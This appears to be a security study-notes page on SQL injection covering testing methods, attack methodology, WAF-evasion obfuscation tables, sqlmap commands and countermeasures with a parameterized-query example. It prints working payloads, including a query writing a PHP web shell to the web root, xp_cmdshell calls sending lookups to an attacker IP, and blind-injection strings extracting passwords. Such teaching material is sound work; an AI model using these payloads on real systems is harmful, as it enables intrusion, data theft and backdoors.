Skip to main content
Version: 1.0.2

SQL injection overview

  • Also known as SQLi
  • Injecting malicious SQL queries into the application.
  • Allows attacker to
    • Gain unauthorized access to system e.g. logging in without credentials
    • Retrieve, modify or delete the information stored in the database
      • E.g. inserting new users, updating passwords
    • Execute code remotely
  • Exploits improper input validation in web applications
  • A code injection technique.
  • 💡 Can test on admin panels e.g. to find using google dorks inurl:adminlogin.aspx, inurl:admin/index.php, inurl:adminlogin.aspx
  • 📝 Simple and quick way to test for SQL injection vulnerability is to insert a single quote (')
    • You can add other SQL code after that once vulnerability is verified.

SQL definition

  • Structured Query Language
  • Lets you access and manipulate databases
  • SQL can be used to query both relational and non-relational databases
    • However SQL database usually means relational database.

Testing SQL injection

Black box testing

  • Also known as blackbox testing or black-box testing
  • Source code is not known to the tester
  • Detect places where input is not sanitized

Function testing

  • Output is compared to expected results
  • E.g. setting ?id= query parameter to 1' then to 1'/* then to '1' AND '1'='1 ..

Fuzz testing

  • Also known as fuzzing testing
  • 📝 Inputting invalid/unexpected or random data and observing the changes in the output
  • Often automated
  • Monitors for exceptions such as crashes, failing built-in code assertions, or potential memory leaks
  • Tools: • WSFuzzerWebScarab • Burp Suite • AppScanq Peach Fuzzer

White box testing

  • Also known as whitebox testing or white-box testing.
  • Analyzing application source code.
  • Static code analysis
    • Detect on source code
  • Dynamic code analysis
    • Analyze during execution of the code
  • Tools include: • VeracodeRIPS • PVS Studio

SQL injection methodology

  1. Information gathering
    • E.g. database structure, name, version, type..
    • Goal is to identify vulnerabilities for SQL injection.
    • Entry points in application tested to inject queries, e.g. invalidated input fields.
    • 💡 Error messages can reveal information about the database type and version.
  2. SQL injection
    • Attacks to extract information from database such as name, column names, and records.
    • Can also insert or update certain information in the database.
      • E.g. modifying password of an existing user or inserting himself as new user to gain access.
  3. Advanced SQL injection
    • Goal is to compromise underlying OS and network
    • Techniques include
      • Interacting with file system
        • E.g. in MySQL: LOAD_FILE() to read and OUTFILE() to write
      • Collect network information
        • E.g. reverse DNS: exec master..xp_cmdshell 'nslookup a.com MyIP'
        • E.g. reverse pings: '; exec master..xp_cmdshell 'ping 10.0.0.75' --
      • Executing commands that call OS functions at runtime
        • E.g. in MySQL: CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'
      • Creating backdoor to use execute commands using a remote shell
        • E.g. SELECT '<?php exec($_GET[''cmd'']); ?>' FROM usertable INTO dumpfile '/var/www/html/shell.php'
      • Transfer database to attackers machine

SQL evasion

  • Obfuscating input strings to avoid signature-based detection systems
  • Using IP fragmentation with optionally trying different orders

Obfuscation against signature detection

Technique Plain-textObfuscated text
In-line commentselect * from userss/**/ele/**/ct/**/*/**/from/**/users
Char encodingechar(101)
String concatenationHello'Hel'+'lo'
Obfuscated codes/?id==1+union+(select+1,2+from+test.users)/?id=(1)union(((((((select(1),hex(hash)from(test.users))))))))
 Manipulating white spacesOR 1 = 1'OR'1'='1'
Hex encodingSELECT @@version = 31SELECT @@version = 0x1F
Sophisticated MatchesOR 1 = 1OR 'hi' = 'hi'
URL Encodingselect * from usersselect%20%2A%20from%20users
Case Variationselect * from usersSeLeCt * FrOM UsErs
Null byteUNION SELECT..%00' UNION SELECT..
Declare VariablesUNION Select Password; declare @sqlvar nvarchar(70); set @myVAR = N'UNI' + N'ON' + N' SELECT' + N'Password'); EXEC(@sqlvar)

OWASP categories

  • SQL injection bypassing WAF | OWASP
  • Normalization
    • Obfuscating with e.g. comments
    • E.g. WAF blocks /?id=1+union+select+1,2,3/*
      • Attacker injects: /?id=1+un/**/ion+sel/**/ect+1,2,3--
      • Request passes WAF, SQL becomes SELECT * from table where id =1 union select 1,2,3--
  • HTTP Parameter Pollution (HPP)
    • Injects delimiting characters into query strings
    • E.g. WAF blocks /?id=1+union+select+1,2,3/*
  • HTTP Parameter Fragmentation (HPF)
    • Exploits SQL is built using more than parameter in backend
      • Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
    • E.g. WAF blocks /?a=1+union+select+1,2/*
      • Attacker injects: /?a=1+union/*&b=*/select+1,2
  • Blind SQL Injection
    • Replacing WAF signatures with their synonyms
    • E.g. WAF blocks /?id=1+OR+0x50=0x50
      • Attacker injects /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1) ))=74
  • Signature bypass
    • E.g. WAF blocks is /?id=1+OR+1=1
      • Attacker injects /?id=1+OR+0x50=0x50

SQL injection tools

  • sqlmap
    • Automatic SQL injection and database takeover tool
    • Requires session that can be retrieved through e.g. running Burp Suite as proxy.
    • Run e.g. sqlmap -u https://cloudarchitecture.io/?id=3&Submit=Submit --cookie 'PHPSESSID=63j6; security:low'
      • Outputs e.g.
        • GET parameter id appears to be MySQL >= 5.0.12 AND time-based blind injectable
        • GET parameter id is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
      • --dbs parameter gets database names e.g. mysql, phpmyadmin...
      • -D <database-name> --tables parameters lists tables from given tabase name..
      • -T <table-name> --columns gives column names
      • -C <comma-separated-column-names> --dump to get columns
    • Can also crack hashes (not as fast as hashcat)
  • jSQL Injection
  • Older tools:
  • Mobile tools
  • See also SQL injection detection tools

SQL injection countermeasures

  • Weakness: The database server runs OS commands

    • Run database with minimal rights
    • Disable OS commands like xp_cmdshell (for shell access)
      • Invoking xp_cmdshell spawns a Windows command shell with input string passed to it for execution
      • Providing local system level access to the server.
  • Weakness: Using privileged account to connect to the database

    • Monitor DB traffic using an IDS
    • Apply least privilege rule for accounts/applications that access databases
  • Weakness: Error message revealing important information

    • Suppress all error messages
    • Use custom error messages
  • Weakness: No data validation at the server

    • Filter and sanitize all client data

    • Size and data type checks protects against buffer overruns

    • E.g.

        // Vulnerable code:
      var command = new SqlCommand("SELECT * FROM table WHERE name = " + login.Name, connection);
      // Safe code:
      var command = new SqlCommand("SELECT * FROM table WHERE name = @name ", connection);
      command.Parameters.Add("@name", SqlDbType.NVarChar, 20).Value = login.Name;
  • Weakness: Implementing consistent coding standards

    • Server-side input validation, data access abstraction layer, custom error messages.
  • Weakness: Firewalling the SQL Server

    • Allow only access from web server and administrators

SQL injection detection tools